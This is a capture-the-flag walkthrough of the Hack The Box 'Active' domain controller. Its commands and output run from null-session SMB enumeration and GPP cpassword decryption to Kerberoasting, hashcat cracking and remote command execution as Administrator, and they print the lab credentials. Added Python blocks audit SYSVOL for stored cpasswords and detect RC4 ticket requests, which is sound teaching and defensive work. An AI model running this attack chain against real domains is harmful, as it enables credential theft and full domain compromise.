Active

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nmap 10.129.23.173 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-19 10:52 EST
Warning: 10.129.23.173 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.23.173
Host is up (0.55s latency).
Not shown: 63806 closed tcp ports (reset), 1706 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49171/tcp open  unknown
49173/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 45.19 seconds
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u guest -p '' --generate-hosts-file hosts
SMB         10.129.23.173   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.173   445    DC               [-] active.htb\guest: STATUS_ACCOUNT_DISABLED

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# cat hosts
10.129.23.173     DC.active.htb active.htb DC

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# cat hosts >> /etc/hosts

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u guest -p '' --generate-krb5-file /etc/krb5.conf
SMB         10.129.23.173   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.173   445    DC               [+] krb5 conf saved to: /etc/krb5.conf
SMB         10.129.23.173   445    DC               [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB         10.129.23.173   445    DC               [-] active.htb\guest: STATUS_ACCOUNT_DISABLED

1.2. SMB

SMB Null Session
The guest account is disabled, so enumerate with a null session (empty username and password) instead.

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb  10.129.23.173 -u guest  -p '' --shares
SMB         10.129.23.173   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.173   445    DC               [-] active.htb\guest: STATUS_ACCOUNT_DISABLED


┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb  10.129.23.173 -u '' -p '' --shares
SMB         10.129.23.173   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.173   445    DC               [+] active.htb\:
SMB         10.129.23.173   445    DC               [*] Enumerated shares
SMB         10.129.23.173   445    DC               Share           Permissions     Remark
SMB         10.129.23.173   445    DC               -----           -----------     ------
SMB         10.129.23.173   445    DC               ADMIN$                          Remote Admin
SMB         10.129.23.173   445    DC               C$                              Default share
SMB         10.129.23.173   445    DC               IPC$                            Remote IPC
SMB         10.129.23.173   445    DC               NETLOGON                        Logon server share
SMB         10.129.23.173   445    DC               Replication     READ
SMB         10.129.23.173   445    DC               SYSVOL                          Logon server share
SMB         10.129.23.173   445    DC               Users
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# impacket-smbclient 10.129.23.173
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use Replication
# ls
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 .
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 ..
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 active.htb
# cd active.htb
# ls
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 .
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 ..
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 DfsrPrivate
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 Policies
drw-rw-rw-          0  Sat Jul 21 06:37:44 2018 scripts
# tree
/active.htb/DfsrPrivate/ConflictAndDeleted
/active.htb/DfsrPrivate/Deleted
/active.htb/DfsrPrivate/Installing
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Finished - 28 files and folders
# get /active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

1.3. GPP Password

GPP Password
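This is a password left behind in Group Policy Preferences (GPP).

The cpassword value in Groups.xml is encrypted with Microsoft's fixed AES key, so gpp-decrypt can decrypt it and recover the plaintext password.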

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u 'active.htb\SVC_TGS' -p GPPstillStandingStrong2k18
SMB         10.129.23.173   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.173   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
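From the defender's side, the same finding can be audited without decrypting anything. The following is an added example, not part of the original write-up: it walks a local copy of SYSVOL (or the Replication share) and reports every XML element that still stores a non-empty cpassword. The sample XML, the account names and the `{CONSTRUCTED-GPO-GUID}` directory are constructed placeholders, and the attribute names other than `userName` are assumptions.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the Groups.xml above; the domain, account
# names and cpassword value are placeholders, not values from the page.
SAMPLE_GROUPS_XML = '''<?xml version="1.0" encoding="utf-8"?>
<Groups>
<User name="EXAMPLE\\svc_demo" changed="2018-01-01 00:00:00">
<Properties action="U" cpassword="Q09OU1RSVUNURUQ" userName="EXAMPLE\\svc_demo"/></User>
<User name="EXAMPLE\\clean" changed="2019-01-01 00:00:00">
<Properties action="U" cpassword="" userName="EXAMPLE\\clean"/></User>
</Groups>'''

# Attributes that name the account in GPP files. userName is the one shown on
# this page; the other two are assumptions about other preference types.
ACCOUNT_ATTRS = ("username", "accountname", "runas")

def scan_gpp_file(path):
    """Return one finding per element that stores a non-empty cpassword."""
    try:
        root = ET.parse(path).getroot()
    except (ET.ParseError, OSError) as exc:
        return [{"file": path, "error": str(exc)}]
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        attrs = {k.lower(): v for k, v in elem.attrib.items()}
        if not attrs.get("cpassword"):
            continue  # attribute absent or empty: no stored secret
        parent = parents.get(elem)
        account = next((attrs[a] for a in ACCOUNT_ATTRS if attrs.get(a)), "(unknown)")
        findings.append({
            "file": path,
            "account": account,
            "changed": parent.get("changed") if parent is not None else None,
            "cpassword_len": len(attrs["cpassword"]),  # report length, never the value
        })
    return findings

def scan_sysvol(top):
    """Walk a SYSVOL (or Replication) copy and scan every XML file in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(top):
        for name in sorted(files):
            if name.lower().endswith(".xml"):
                findings.extend(scan_gpp_file(os.path.join(dirpath, name)))
    return findings

def run_demo():
    """Build a throwaway Policies tree holding the sample and scan it."""
    with tempfile.TemporaryDirectory() as top:
        gpo = os.path.join(top, "Policies", "{CONSTRUCTED-GPO-GUID}",
                           "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(top)

if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The MS14-025 update stops new cpassword values from being created but does not remove ones already in SYSVOL. Every account reported here needs its preference item deleted and its password changed.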

1.4. Bloodhound

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# bloodhound-ce-python -c All -p  GPPstillStandingStrong2k18  -u 'SVC_TGS' -d active.htb -ns 10.129.23.173  --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: active.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 5 users
INFO: Found 41 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20251119111451_bloodhound.zip

Nothing useful came out of the BloodHound data.

1.5. SMB

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u 'active.htb\SVC_TGS' -p GPPstillStandingStrong2k18 --shares
SMB         10.129.23.173   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.173   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB         10.129.23.173   445    DC               [*] Enumerated shares
SMB         10.129.23.173   445    DC               Share           Permissions     Remark
SMB         10.129.23.173   445    DC               -----           -----------     ------
SMB         10.129.23.173   445    DC               ADMIN$                          Remote Admin
SMB         10.129.23.173   445    DC               C$                              Default share
SMB         10.129.23.173   445    DC               IPC$                            Remote IPC
SMB         10.129.23.173   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.23.173   445    DC               Replication     READ
SMB         10.129.23.173   445    DC               SYSVOL          READ            Logon server share
SMB         10.129.23.173   445    DC               Users           READ
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# impacket-smbclient 'svc_tgs:GPPstillStandingStrong2k18@10.129.23.173'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use  Users
# ls
drw-rw-rw-          0  Sat Jul 21 10:39:20 2018 .
drw-rw-rw-          0  Sat Jul 21 10:39:20 2018 ..
drw-rw-rw-          0  Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw-          0  Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw-          0  Mon Jul 16 17:08:47 2018 Default
drw-rw-rw-          0  Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw-        174  Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw-          0  Mon Jul 16 17:08:47 2018 Public
drw-rw-rw-          0  Sat Jul 21 11:16:32 2018 SVC_TGS
# tree
/desktop.ini
/Default/AppData
/Default/Application Data
/Default/Cookies
/Default/Desktop
/Default/Documents
/Default/Downloads
/Default/Favorites
/Default/Links
/Default/Local Settings
/Default/Music
/Default/My Documents
/Default/NetHood
/Default/NTUSER.DAT
/Default/NTUSER.DAT.LOG
/Default/NTUSER.DAT.LOG1
/Default/NTUSER.DAT.LOG2
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
/Default/Pictures
/Default/PrintHood
/Default/Recent
/Default/Saved Games
/Default/SendTo
/Default/Start Menu
/Default/Templates
/Default/Videos
/SVC_TGS/Contacts
/SVC_TGS/Desktop
/SVC_TGS/Downloads
/SVC_TGS/Favorites
/SVC_TGS/Links
/SVC_TGS/My Documents
/SVC_TGS/My Music
/SVC_TGS/My Pictures
/SVC_TGS/My Videos
/SVC_TGS/Saved Games
/SVC_TGS/Searches
/Default/AppData/Local
/Default/AppData/Roaming
/Default/Documents/My Music
/Default/Documents/My Pictures
/Default/Documents/My Videos
>>>> /SVC_TGS/Desktop/user.txt
/Default/AppData/Local/Application Data
/Default/AppData/Local/History
/Default/AppData/Local/Microsoft
/Default/AppData/Local/Temp
/Default/AppData/Local/Temporary Internet Files
/Default/AppData/Roaming/Microsoft
/Default/AppData/Local/Microsoft/Windows
/Default/AppData/Roaming/Microsoft/Internet Explorer
/Default/AppData/Roaming/Microsoft/Windows
/Default/AppData/Local/Microsoft/Windows/GameExplorer
/Default/AppData/Local/Microsoft/Windows/History
/Default/AppData/Local/Microsoft/Windows/Temporary Internet Files
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch
/Default/AppData/Roaming/Microsoft/Windows/Cookies
/Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Printer Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Recent
/Default/AppData/Roaming/Microsoft/Windows/SendTo
/Default/AppData/Roaming/Microsoft/Windows/Start Menu
/Default/AppData/Roaming/Microsoft/Windows/Templates
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/desktop.ini
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Server Manager.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Shows Desktop.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Window Switcher.lnk
/Default/AppData/Roaming/Microsoft/Windows/Recent/CustomDestinations
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Compressed (zipped) Folder.ZFSendToTarget
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop (create shortcut).DeskLink
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Mail Recipient.MAPIMail
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs
/Default/AppData/Roaming/Microsoft/Windows/Recent/CustomDestinations/590aee7bdd69b59b.customDestinations-ms
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Command Prompt.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Notepad.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Run.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Windows Explorer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Help.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Ease of Access.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Magnify.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Narrator.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/On-Screen Keyboard.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/computer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Control Panel.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Desktop.ini
Finished - 100 files and folders
# get /SVC_TGS/Desktop/user.txt

2. System

2.1. Kerberoasting

Kerberoasting
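As the name suggests, this account is a service account. It can enumerate and request tickets for every account that has an SPN, which yields the krb5tgs hash (service ticket hash) of the corresponding domain user.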
impacket-GetUserSPNs

┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# impacket-GetUserSPNs  -k -no-pass  'active.htb/SVC_TGS@10.129.23.173' -dc-host  DC.active.htb -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2025-11-19 10:49:38.760543



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$504e6baca68dc696665572b9315097cf$e8b55f1a65caadd4edd8fac9fd826faf8b738164424d322f2d112235dc75ca5639889125da9563c011c399f1049b1658ab5f89da1d69bcc5634dca0b957949890c4e12fa8f7266e1874bd8875b3aa77fcfe108040ffb9018f708033bb37bcca7e222a0c398f08831e5799ec4b4628e88be4f6ffcd06b8c684c3b5ae507cd23ba9e36a91109e9982bf8b938841b4b54cc64882d9daaf1411b2ceeac7ed58e7a04985b5a386ebed88ecc55d70a3963cbbaf03f05ea13a8c3db09a04622e65b1f5e21a888405d83804d48ba8dc14eda7e172910da37e67c0331b1a31ae248f7c36c447455799847a1312412e7a76b372031cc064e0e8ed50f7968b4b91c6f43716c6f7956d2260ff5e653904be2609f6e51afe25412f54cf7df7b6694126a2af3a29c97ac932ff45bf737d04bfa4de4eda710d15dfb189074e54cae7a7574e099674e8627d3e089eebbd41b8d550fe883a2afff0f0e34723cdcca60a8ffe52052a90b25d4097eb8f208ca727fdb1ce6efd715ed1cd3bbbd396dcba099f7230658a0d3d8244b5d4c2540b34f29ac70159cdbd18c813bfcd0e9c402b9943653e6ceaf5e95e071705aa355a298a38a954c119a4bf63fffe9c78121e7990552f1356867ccef6ddf8a20b937f4e3de0a76645de33cea862a8310bc6b11f5d9938bdcba4923330401c8d6602548c6ef0743648ef3b1677bf238b69da268618f7a50e438b86661becca7873235fc2f5c27a62c831cedac350689859d6877d9d765692d84d444a8e5cc22a609d15d8da6a269ab6ff6194f0f6de70db7e5e1d119ecff72a271f8e330ad1f8bfbb4a5abd9198e9ad08ca8b1c80357acf02c4809d5b529e74cd89491c7091fe129fdfb1c3b7090249d514b3ed735af9c2c61f7fe8371b1e25e0b0230d682d4f63d76c92c8ee0a1208873217c75ee62e911aed913677c37cd2f5cf4b6714bd33f59844d104bbcc4f37a44b73086be8dedd3cdc9c17f41519e098f1a80f0229bb2951f20bc07cecd47c005826d448d79f860623bc62347b157f1d7a8a9940c8c3bee1c34c001cc3399bc77db81ab730d33596cf9401c7041591ca0bc00855d7c1a688cb8c27691873e1100fcb9983faff9755c05422e83ce5b8c77fe657058c271611c12829ef513d60c5b82e8a4beef821b878e77f32a442a24829adb9b80f5cdfb15617dc0b4e4b5c10ba0e97319570ed4b3c06d0478c6445356f9732159a813474ca30f1dec2f82fbbd8ea58e65f82098acc921
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$504e6baca68dc696665572b9315097cf$...:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...acc921
Time.Started.....: Thu Nov 20 00:25:59 2025 (0 secs)
Time.Estimated...: Thu Nov 20 00:25:59 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 16541.8 kH/s (6.15ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 47c Util: 25% Core:1890MHz Mem:8001MHz Bus:8
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u administrator -p Ticketmaster1968 -x "type c:\users\administrator\desktop\root.txt"
SMB         10.129.23.173   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.173   445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB         10.129.23.173   445    DC               [+] Executed command via wmiexec
SMB         10.129.23.173   445    DC               663fcafcfb4ed067f71039e46f5c249e
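On the detection side, the ticket request in section 2.1 appears on the domain controller as Security event 4769 with ticket encryption type 0x17 (RC4, the etype 23 in the hash above) for a service that runs as a user account. The following is an added example, not part of the original write-up: it filters such events from JSON lines. The sample events, the `svc_sql` and `alice` accounts and the IP addresses are constructed, and the JSON export layout is an assumption.

```python
import json
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, as in the $krb5tgs$23$ hash above

# Constructed 4769/4768 events, one JSON object per line (assumed export layout).
SAMPLE_EVENTS = """\
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "alice@ACTIVE.HTB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.20", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "alice@ACTIVE.HTB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.20", "Status": "0x1b"}
{"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.20", "Status": "0x0"}
"""

def detect_rc4_service_tickets(lines):
    """Return successful RC4 service-ticket requests for user-account services."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the run
        if ev.get("EventID") != 4769:
            continue  # only service-ticket requests are of interest
        if int(ev.get("Status", "0x0"), 16) != 0:
            continue  # failed requests issue no ticket
        service = ev.get("ServiceName", "")
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and krbtgt have long random keys
        if int(ev.get("TicketEncryptionType", "0x0"), 16) != RC4_HMAC:
            continue
        alerts.append({"requester": ev.get("TargetUserName", ""),
                       "service": service,
                       "source": ev.get("IpAddress", "")})
    return alerts

def summarize(alerts):
    """Group alerts per (requester, source) so bulk requests stand out."""
    per_requester = defaultdict(set)
    for alert in alerts:
        per_requester[(alert["requester"], alert["source"])].add(alert["service"])
    return {key: sorted(services) for key, services in per_requester.items()}

if __name__ == "__main__":
    found = detect_rc4_service_tickets(SAMPLE_EVENTS.splitlines())
    for key, services in summarize(found).items():
        print(key, "->", services)
```

In domains where RC4 is still in normal use this filter needs a baseline of legitimate requesters before it is useful as an alert. The underlying fix is a long random password (or a managed service account) for every account that carries an SPN, and no SPN on privileged accounts such as Administrator.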